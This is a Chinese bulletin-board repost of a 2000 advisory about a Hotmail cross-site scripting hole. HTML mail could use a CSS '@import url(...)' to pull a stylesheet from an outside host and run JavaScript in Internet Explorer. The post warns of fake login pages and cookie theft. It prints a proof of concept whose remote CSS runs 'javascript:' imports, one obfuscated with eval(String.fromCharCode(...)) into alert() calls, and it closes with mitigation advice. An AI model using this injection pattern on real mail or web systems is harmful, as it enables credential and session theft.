发信人: williamlong()
整理人: williamlong(2000-05-09 12:52:02), 站内信件
|
Hotmail允许用户在EMAIL中使用"@import url(http://host/hostile.css)"
运行javascript代码,当用户用IE浏览邮件里的信件时可能会危及用户Hotmail
邮箱的安全。如果在Hotmail的邮件中用
了javascript的代码,比如<style>标签,@import和其它javascript语句。当用
户用IE浏览邮件时,有可能看到的是一个要求输入用户名和口令的虚假页面,这
样用户的用户名和口令就会给盗走。并且有
可能从Hotmail中获得cookie,这是很危险的。
下面的javascript语句嵌入到一个HTML文件中,当运行这个HTML文件时,下面的
语句就会被执行。
<STYLE type=text/css>
@import url(http://www.nat.bg/~joro/test.css);
</STYLE>
其中下面是http://www.nat.bg/~joro/test.css里的内容:
@import url(javascript:alert('JavaScript is executed'));
@import url(javascript:eval(String.fromCharCode(97,108,101,114,116,40,
39,84,101,115,116,32,49,39,41,59,97 ,108,101,114,116,40,39,
84,101,115,116,32,50,39,41,59)));
解决的方法:
当用浏览Hotmail的邮件时,关闭IE里的JAVASCRIPT脚本的执行或者不使用I
E浏览信件。目前hotmail已经修复该漏洞。
--
☆ 蓝色月光 ☆ http://williamlong.163.net
※ 来源:.月光软件站 http://www.moon-soft.com.[FROM: 61.128.129.3]
|
|